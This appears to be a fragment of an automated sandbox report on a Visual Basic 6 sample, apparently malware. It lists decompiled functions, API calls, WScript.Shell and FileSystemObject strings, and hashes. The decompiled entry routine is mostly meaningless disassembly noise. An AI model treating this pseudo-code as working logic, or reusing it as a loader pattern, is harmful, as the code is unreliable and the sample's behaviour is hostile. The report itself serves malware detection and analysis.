__vbaFreeStr.MSVBVM60(0041E996,?,00000000), ref: 0041E988
__vbaFreeStr.MSVBVM60(0041E996,?,00000000), ref: 0041E990

Strings

Desorganisationens, xrefs: 0041E947
Propreste7, xrefs: 0041E942
Gulsoterne, xrefs: 0041E8D0
FolderExists, xrefs: 0041E8FC
Scripting.FileSystemObject, xrefs: 0041E8A7

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
API String ID: 3773181626-3836659718
Opcode ID: 81368cce2580c329bc35be1c6a86989158cb481e53b03e2dd0c5cbf69d8a1c72
Instruction ID: 993e0908f6face3513dd1e0c622763fa47112846a30ec2a45ce9fd93422a6301
Opcode Fuzzy Hash: 81368cce2580c329bc35be1c6a86989158cb481e53b03e2dd0c5cbf69d8a1c72
Instruction Fuzzy Hash: 5D314A71910209A7DB14EBA2CD86FEE7778AF01708F20453FB101770E2EBBC56058B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042114C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0042114C(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long long* _v28;
				char _v40;
				char _v44;
				char _v60;
				char* _t18;
				char* _t20;
				char* _t22;
				void* _t31;
				long long* _t32;

				_t32 = _t31 - 0x18;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t32;
				_t18 = 0x2c;
				L00401540();
				_v28 = _t32;
				_v24 = 0x4014e0;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				_t22 =  &_v40;
				L004017B6();
				_v8 = 2;
				_push(_t22);
				_push(_t22);
				 *_t32 =  *0x401520;
				L004015D6();
				L004015DC();
				asm("fcomp qword [0x401518]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags < 0) {
					_v8 = 3;
					_push(0xffffffff);
					L004016E4();
					_v8 = 4;
					_push(0);
					_push(L"WScript.Shell");
					_push( &_v60); // executed
					L004016F0(); // executed
					_t20 =  &_v60;
					_push(_t20);
					L004016F6();
					_push(_t20);
					_t18 =  &_v44;
					_push(_t18);
					L004016FC();
					L00401828();
				}
				asm("wait");
				_push(0x421223);
				L00401846();
				L004017C2();
				return _t18;
			}

0x0042114f
0x00421152
0x0042115d
0x0042115e
0x00421167
0x00421168
0x00421170
0x00421173
0x0042117a
0x00421181
0x00421188
0x00421192
0x00421195
0x0042119a
0x004211a7
0x004211a8
0x004211a9
0x004211ac
0x004211b1
0x004211b6
0x004211bc
0x004211be
0x004211bf
0x004211c1
0x004211c8
0x004211ca
0x004211cf
0x004211d6
0x004211d8
0x004211e0
0x004211e1
0x004211e6
0x004211e9
0x004211ea
0x004211ef
0x004211f0
0x004211f3
0x004211f4
0x004211fc
0x004211fc
0x00421201
0x00421202
0x00421215
0x0042121d
0x00421222

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421168
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00421195
#582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 004211AC
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 004211B1
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004211CA
#716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004211E1
__vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004211EA
__vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004211F4
__vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004211FC
__vbaFreeStr.MSVBVM60(00421223,?,?,?,?,?,?,00401546), ref: 00421215
__vbaFreeObj.MSVBVM60(00421223,?,?,?,?,?,?,00401546), ref: 0042121D

Strings

WScript.Shell, xrefs: 004211D8

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#582#716AddrefChkstkCopyError
String ID: WScript.Shell
API String ID: 2682307056-813827646
Opcode ID: 7cec5828c2e748220aad10bfdacc2a2b69bbfff0e22139a70bc049e3979f2c18
Instruction ID: cbf3090ce13326deda58e614f37a6497e62e866cfa408eeae1c588c9e7a6e3a1
Opcode Fuzzy Hash: 7cec5828c2e748220aad10bfdacc2a2b69bbfff0e22139a70bc049e3979f2c18
Instruction Fuzzy Hash: 34111CB1900208FBDB10EFA1DD46BDEBBB8AB14708F50456EF111771E1DB7D5A048BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00421236, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00421236(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L00401540();
				_v12 = _t76;
				_v8 = 0x401528;
				L004016FC();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401546, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x402300);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004016FC();
				L004015D0();
				_v28 = E00421589( &_v36);
				L004017C2();
				_v32 = E00421589(_v28) + 0x2b0;
				E004213CE(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x402300);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v88 = _t62;
				}
				_push(0x421379);
				L004017C2();
				return _t62;
			}

0x00421236
0x00421247
0x00421251
0x00421259
0x0042125c
0x0042126a
0x0042127b
0x0042127e
0x00421280
0x00421287
0x004212a0
0x00421289
0x00421289
0x0042128b
0x00421290
0x00421293
0x00421296
0x0042129b
0x0042129b
0x004212a7
0x004212b1
0x004212ba
0x004212c5
0x004212cb
0x004212dd
0x004212e6
0x004212eb
0x004212f2
0x004212f9
0x00421300
0x0042130a
0x00421314
0x00421315
0x00421316
0x00421317
0x0042131b
0x00421325
0x00421326
0x00421327
0x00421328
0x00421331
0x00421337
0x00421339
0x00421340
0x0042135c
0x00421342
0x00421342
0x00421347
0x0042134c
0x0042134f
0x00421352
0x00421357
0x00421357
0x00421360
0x00421373
0x00421378

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421251
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042126A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402300,00000058), ref: 00421296
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004212B1
#644.MSVBVM60(?,?,?), ref: 004212BA
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004212CB
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042130A
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042131B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402300,000002B0), ref: 00421352
__vbaFreeObj.MSVBVM60(00421379), ref: 00421373

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: 25e7e057e92137560fee1c532e5b3c600111c51a8cf45a4af8161f20a2cce5d1
Instruction ID: 0c98c4180ef7e539de13bcf30614bb65e98fc1db1d25b79b94c0326acaf2edc0
Opcode Fuzzy Hash: 25e7e057e92137560fee1c532e5b3c600111c51a8cf45a4af8161f20a2cce5d1
Instruction Fuzzy Hash: 23412571900218EFDF01DF91DC46BDEBBB9AF04744F20442AF901BB1A1C7B9A9468B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 81%

			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int __esi) {
				signed int _t111;
				signed char _t112;
				signed char _t114;
				intOrPtr* _t115;
				intOrPtr* _t116;
				signed char _t118;
				signed int _t123;
				intOrPtr* _t124;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t128;
				void* _t133;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				signed char _t140;
				intOrPtr* _t141;
				signed int _t142;
				void* _t144;
				signed int* _t145;
				intOrPtr* _t146;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t154;
				signed int _t156;
				intOrPtr _t171;
				intOrPtr _t178;
				intOrPtr* _t182;

				_t151 = __esi;
				_t141 = __ecx;
				_push("VB5!6&*"); // executed
				L00401882(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *(__edx - 0x58) =  *(__edx - 0x58) ^ __eax;
				asm("wait");
				_push(ss);
				asm("das");
				_t138 = __ebx - 1;
				asm("scasb");
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__esi =  *__esi + _t138;
				 *0xa74fb7f8 = __eax;
				asm("pushfd");
				_t154 =  *(__esi + 0x6f) * 0x65696c - 1;
				_pop(_t144);
				 *((intOrPtr*)(__ecx - 0x242943c3)) = __eax;
				asm("fcomip st0, st2");
				asm("invalid");
				_t149 = __eax;
				_pop( *_t11);
				_pop(_t111);
				_t139 = _t138 ^  *(__ecx - 0x48ee309a);
				asm("cdq");
				asm("iretw");
				asm("adc [edi+0xaa000c], esi");
				asm("pushad");
				asm("rcl dword [ebx], cl");
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				 *_t111 =  *_t111 + _t111;
				_push(_t144);
				 *_t111 =  *_t111 + _t111;
				 *_t154 =  *_t154 + __ecx;
				 *_t111 =  *_t111 + _t111;
				 *0x6f684300 =  *0x6f684300 + __ecx;
				_t171 =  *0x6f684300;
				asm("outsb");
				if(_t171 < 0) {
					L4:
					asm("outsb");
					 *_t111 =  *_t111 + _t111;
					 *_t111 =  *_t111 + _t111;
					 *_t111 =  *_t111 + _t111;
					 *_t111 =  *_t111 + _t111;
					 *_t111 =  *_t111 + _t111;
					 *_t111 =  *_t111 + _t111;
				} else {
					asm("insd");
					if(_t171 < 0) {
						asm("outsd");
						asm("insd");
						asm("popad");
						 *0x4d000a01 =  *0x4d000a01 + __ecx;
						asm("popad");
						 *__ecx =  *__ecx + _t139;
						 *_t111 =  *_t111 + _t111;
						_t146 = _t144 + 1;
						 *((intOrPtr*)(_t146 + __ecx)) =  *((intOrPtr*)(_t146 + __ecx)) + _t111;
						 *((intOrPtr*)(_t154 + 0x61)) =  *((intOrPtr*)(_t154 + 0x61)) + __ecx;
						_t151 =  *(_t154 + __eax + 0x74) * 0x35737265;
						 *0x149d =  *0x149d + _t146;
						asm("movsd");
						_push(ds);
						 *_t111 =  *_t111 + _t111;
						asm("adc al, [eax]");
						 *((intOrPtr*)(_t111 + _t111 + 0x46)) =  *((intOrPtr*)(_t111 + _t111 + 0x46)) + _t111;
						_t149 = 0x74000022;
						_t135 = _t111;
						_push(es);
						 *_t135 =  *_t135 + _t135;
						 *((intOrPtr*)(_t135 + 0x1004031)) =  *((intOrPtr*)(_t135 + 0x1004031)) + _t139;
						 *_t146 =  *_t146 + _t135;
						 *((intOrPtr*)(__ecx + 0x40)) =  *((intOrPtr*)(__ecx + 0x40)) + _t146;
						 *_t135 =  *_t135 + _t135;
						asm("invalid");
						asm("invalid");
						asm("invalid");
						asm("invalid");
						 *_t135 =  *_t135 + _t135;
						 *_t135 =  *_t135 + _t135;
						_t111 = _t135 - 0x00000001 &  *(_t135 - 1);
						asm("sbb al, 0x20");
						_t144 = _t146 + 1;
						 *_t111 =  *_t111 + _t111;
						 *_t111 =  *_t111 + _t111;
						 *((intOrPtr*)(_t111 + 0x6ed8)) =  *((intOrPtr*)(_t111 + 0x6ed8)) + _t111;
						goto L4;
					}
				}
				 *_t111 =  *_t111 + _t111;
				_t145 = _t144 + 1;
				_t112 = _t111 ^ 0x2a263621;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t151 =  *_t151 + _t139;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				 *_t112 =  *_t112 + _t112;
				_t114 = (_t112 |  *_t112) + 4;
				 *_t114 =  *_t114 + _t114;
				 *_t114 =  *_t114 + _t114;
				 *_t114 =  *_t114 + _t114;
				 *_t114 =  *_t114 + _t114;
				 *_t114 =  *_t114 + _t114;
				asm("movsb");
				asm("sbb al, 0x40");
				 *_t114 =  *_t114 + _t114;
				asm("lock xor [ecx], al");
				_t140 = _t139 + _t139;
				asm("invalid");
				 *_t114 =  *_t114 | _t114;
				 *_t114 =  *_t114 + _t114;
				 *_t114 =  *_t114 + _t114;
				 *_t114 =  *_t114 + _t114;
				_t115 = _t114 +  *_t114;
				 *_t115 =  *_t115 + _t115;
				goto 0x54401a09;
				asm("sbb al, [eax]");
				if( *_t115 >= 0) {
					_t115 = _t115 + 1;
					 *((intOrPtr*)(_t115 + _t140 + 0x780040)) =  *((intOrPtr*)(_t115 + _t140 + 0x780040)) + _t145;
					 *_t115 =  *_t115 + _t115;
					 *_t115 =  *_t115 + _t115;
					 *_t115 =  *_t115 + _t115;
					es =  *_t115;
					 *_t115 =  *_t115 + _t115;
					 *_t115 =  *_t115 + _t115;
					 *_t115 =  *_t115 + _t115;
				}
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				 *_t115 =  *_t115 + _t115;
				_t39 = _t151 + 0x69;
				 *_t39 =  *((intOrPtr*)(_t151 + 0x69)) + _t115;
				_t178 =  *_t39;
				asm("insb");
				if(_t178 == 0) {
					L12:
					_t115 = _t115 + 1;
					 *((intOrPtr*)(_t115 + _t115)) =  *((intOrPtr*)(_t115 + _t115)) + _t141;
				} else {
					if(_t178 >= 0) {
						_push(0x64);
						asm("gs outsb");
						if (_t178 >= 0) goto L11;
						_t156 =  *(_t151 + 0x6f) * 0x65696c;
						 *((intOrPtr*)(_t141 + 0x6e + _t156 * 2)) =  *((intOrPtr*)(_t141 + 0x6e + _t156 * 2)) + _t141;
						asm("outsd");
						asm("insb");
						 *_t115 =  *_t115 + _t115;
						_push(ds);
						 *0xa74fb7f8 = _t115;
						asm("pushfd");
						_t154 = _t156 - 1;
						_pop(_t145);
						 *((intOrPtr*)(_t141 + 0xd6bc3d)) = _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t145;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t115 =  *_t115 + _t115;
						 *_t140 =  *_t140 + _t141;
						 *_t115 =  *_t115 + _t115;
						_t115 = _t115 + _t145;
						asm("sbb [eax], al");
						goto L12;
					}
				}
				 *_t115 =  *_t115 + _t145;
				 *_t115 =  *_t115 + _t115;
				asm("invalid");
				_t142 = _t141 - 1;
				_t116 = _t115 - 0xa6;
				asm("lodsd");
				asm("sbb [esi-0x1f], eax");
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *((intOrPtr*)(_t142 + _t142 * 4)) =  *((intOrPtr*)(_t142 + _t142 * 4)) + _t145;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *_t116 =  *_t116 + _t116;
				 *0x9c004034 = 0x9c004034 +  *0x9c004034;
				 *_t142 =  *_t142 + 0x9c004034;
				 *_t142 =  *_t142 + 0x9c004034;
				 *((intOrPtr*)(_t142 + 0x40)) =  *((intOrPtr*)(_t142 + 0x40)) + _t145;
				 *0x9c004034 = 0x9c004034 +  *0x9c004034;
				asm("rol byte [ecx], 0xff");
				asm("invalid");
				 *0x9c004034 =  *0x9c004034 + 1;
				 *0x9c004034 = 0x9c004034 +  *0x9c004034;
				 *0x9c004034 =  *0x9c004034 + _t140;
				_t118 = 0x9c004034 &  *0x9c004034;
				 *_t145 =  *_t145 & _t118;
				 *0x9c004034 =  *0x9c004034 + _t118;
				 *_t118 =  *_t118 + _t118;
				 *0x7052 =  *0x7052 + 0x7052;
				 *0x7052 =  *0x7052 + 0x7052;
				 *0x7052 =  *0x7052 + 0x7052;
				 *0x7052 =  *0x7052 + 0x7052;
				 *0x7052 =  *0x7052 + 0x7052;
				 *((intOrPtr*)(_t140 + _t140 + 0x40)) =  *((intOrPtr*)(_t140 + _t140 + 0x40)) + _t142;
				 *_t142 =  *_t142 + 0x7052;
				 *0x7052 =  *0x7052 + 0x7052;
				 *0x00007086 =  *((intOrPtr*)(0x7086)) + 0x7052;
				 *0x7052 =  *0x7052 + 0x7053;
				 *0x7052 =  *0x7052 + 0x7053;
				 *((intOrPtr*)(_t140 + _t140 + 0x40)) =  *((intOrPtr*)(_t140 + _t140 + 0x40)) + _t142;
				 *_t142 =  *_t142 + 0x7053;
				 *0x7052 =  *0x7052 + 0x7053;
				 *((intOrPtr*)(_t140 + _t140 + 0x40)) =  *((intOrPtr*)(_t140 + _t140 + 0x40)) + _t145;
				 *0x7052 =  *0x7052 + 0x7053;
				 *0x7052 =  *0x7052 + 0x7053;
				 *0x0000706D =  *((intOrPtr*)(0x706d)) + _t145;
				 *_t145 =  *_t145 + 0x7054;
				 *0x7052 =  *0x7052 + 0x7054;
				 *((intOrPtr*)(_t140 + _t140 + 0x40)) =  *((intOrPtr*)(_t140 + _t140 + 0x40)) + _t145;
				 *0x7052 =  *0x7052 + 0x7054;
				 *((intOrPtr*)(_t149 + 0x6c006801)) =  *((intOrPtr*)(_t149 + 0x6c006801)) + _t145;
				asm("sbb eax, [eax]");
				asm("int3");
				_t123 = 0xe0a8 &  *_t145;
				 *0x7052 =  *0x7052 + _t123;
				 *0x7052 =  *0x7052 + _t123;
				_t124 = _t123 - 0x12;
				_t182 = _t124;
				if (_t182 == 0) goto L14;
				if(_t182 >= 0) {
					_t133 = _t124 + 1;
					 *0x4000B086 =  *((intOrPtr*)(0x4000b086)) + _t133;
					 *0x3400 =  *0x3400 + _t142;
					 *0x0100B086 =  *((intOrPtr*)(0x100b086)) + _t145;
					 *_t140 =  *_t140 + _t133;
					 *0x7052 =  *0x7052 + _t133;
					 *0x7052 =  *0x7052 + _t133;
					 *0x7052 =  *0x7052 + _t133;
					 *0x7052 =  *0x7052 + _t133;
					asm("sbb eax, [eax]");
					 *0x34A070C5 =  *0x34A070C5 ^ _t140;
					_t124 = _t133 + _t133 + 1;
					 *_t142 =  *_t142 + _t124;
					 *_t140 =  *_t140 + _t124;
					 *0x7052 =  *0x7052 + _t124;
					_pop(ds);
					 *0x7052 =  *0x7052 + _t140;
					 *0x7052 =  *0x7052 + _t124;
				}
				 *_t124 =  *_t124 + _t124;
				_t126 = _t124 + 0x00000001 &  *(_t124 + 1);
				asm("invalid");
				asm("invalid");
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				 *_t126 =  *_t126 + _t126;
				asm("adc [eax+eax*2], bl");
				_t92 = _t126 + 0xe;
				 *_t92 =  *((intOrPtr*)(_t126 + 0xe)) + _t145;
				if ( *_t92 >= 0) goto L17;
				_push(_t126);
				_t127 = _t126 &  *_t126;
				asm("invalid");
				asm("invalid");
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				if( *_t127 == 0) {
					L20:
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
				} else {
					_t127 = _t127 + 1 + _t145;
					asm("sbb al, [eax]");
					if(_t127 >= 0) {
						 *((intOrPtr*)(_t151 + 0x18)) =  *((intOrPtr*)(_t151 + 0x18)) + _t145;
						_t127 = _t127 + 2;
						 *((intOrPtr*)(_t127 + _t140 + 0x40)) =  *((intOrPtr*)(_t127 + _t140 + 0x40)) + _t140;
						 *_t127 =  *_t127 + _t127;
						 *_t127 =  *_t127 + _t127;
						 *_t127 =  *_t127 + _t127;
						 *_t127 =  *_t127 + _t127;
						 *_t127 =  *_t127 + _t127;
						goto L20;
					}
				}
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				asm("pushfd");
				asm("sbb eax, [eax]");
				asm("hlt");
				asm("sbb al, [eax]");
				if( *_t127 >= 0) {
					 *((intOrPtr*)(_t151 + 0x18)) =  *((intOrPtr*)(_t151 + 0x18)) + _t145;
					_t127 = _t127 + 2;
					 *((intOrPtr*)(_t127 + _t140 + 0x40)) =  *((intOrPtr*)(_t127 + _t140 + 0x40)) + _t140;
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
					 *_t127 =  *_t127 + _t127;
				}
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				 *_t127 =  *_t127 + _t127;
				asm("hlt");
				 *_t127 =  *_t127 + _t127;
				 *((intOrPtr*)(_t142 + 0x40)) =  *((intOrPtr*)(_t142 + 0x40)) + _t145;
				_t128 = _t127 + 1;
				 *_t128 =  *_t128 + _t128;
				 *_t128 =  *_t128 + _t128;
				return _t128 + _t128;
			}

0x00401888
0x00401888
0x00401888
0x0040188d
0x00401892
0x00401894
0x00401896
0x00401898
0x0040189a
0x0040189e
0x004018a0
0x004018a2
0x004018a4
0x004018a7
0x004018a9
0x004018aa
0x004018ab
0x004018b3
0x004018b4
0x004018b6
0x004018b8
0x004018ba
0x004018bc
0x004018be
0x004018c0
0x004018c2
0x004018cc
0x004018ce
0x004018d2
0x004018d4
0x004018d6
0x004018db
0x004018dc
0x004018df
0x004018e0
0x004018e6
0x004018e8
0x004018ea
0x004018ed
0x004018f4
0x004018f8
0x004018f9
